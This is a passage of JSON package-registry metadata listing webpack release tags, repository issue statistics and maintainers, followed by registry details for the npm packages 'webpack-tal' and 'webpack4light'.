.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T14:43:22.729Z","dependent_packages_count":0,"downloads":14,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":50.507620471597235,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":22.622286491307996},"purl":"pkg:npm/webpack-tal","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-tal","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-tal","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-tal/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-tal/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-tal/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-tal/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-tal/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-tal/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-tal/codemeta","maintainers":[{"uuid":"xinwangwang","login":"xinwangwang","name":null,"email":"1669499355@qq.com","url":null,"packages_count":35,"html_url":"https://www.npmjs.com/~xinwangwang","role":null,"created_at":"2022-11-15T10:40:37.574Z","updated_at":"2022-11-15T10:40:37.574Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/xinwangwang/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2569028,"name":"webpack4light","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom 